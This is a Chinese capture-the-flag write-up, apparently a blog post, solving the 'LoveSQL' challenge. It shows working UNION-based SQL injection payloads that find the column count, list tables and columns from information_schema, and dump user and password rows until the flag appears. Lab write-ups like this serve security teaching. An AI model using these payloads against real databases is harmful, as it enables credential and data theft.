[极客大挑战 2019]LoveSQL

题目分析

1.访问网址
在这里插入图片描述根据题目提示,这是一个sql注入题目

2.brup抓包,检测是否存在注入点
因为其传入username,password参数,所以

#我们猜测后端sql语句为
select * from users where username=$username and password=$password
#所以我们构造检测是否存在注入点的语句为:
select * from users where username=admin'or 1=1

构造请求包如下
在这里插入图片描述爆出来了密码,以为是flag,但是输入以后不对,但是存在注入点我们是检测出来了,接下来就是获取数据库信息

3.获取返回的列数
在这里插入图片描述

#用联合查询语句时,返现返回的列数不匹配,所以我们凑列数
union select 1,2,3 

在这里插入图片描述
所以,返回的列为3列,且显示2,3列信息

4.爆信息

#获取当前数据库中的所有表名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =database() ),3%23

在这里插入图片描述

#爆每个greekuser表的字段名
union select 1,(select group_concat(column_name) from information_schema.columns where table_name='geekuser' and table_schema=database()),3%23

在这里插入图片描述暴出id,username,password三个字段

#爆geekuser表中id,username,password字段的值
union select id,username,password from geekuser limit 0,1%23

在这里插入图片描述更改为limit 1,1(从数据库中下标为1(从0开始标号)开始,取一条数据返回)是没有返回消息,说明就geekuser表中就一条数据

查看

#爆每个greekuser表的字段名
union select 1,(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' and table_schema=database()),3%23

在这里插入图片描述暴出id,username,password三个字段

#爆geekuser表中id,username,password字段的值
union select id,username,password from l0ve1ysq1 limit 0,1%23

在这里插入图片描述返回的不是flag,但是后面还有好多
所以,我们采用brup,穷举出表内所有数据
在这里插入图片描述最终,在下标为15的数据处,发现了flag
在这里插入图片描述
flag{dcd4b306-2049-4975-ab5f-90822d6aa6b5}

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值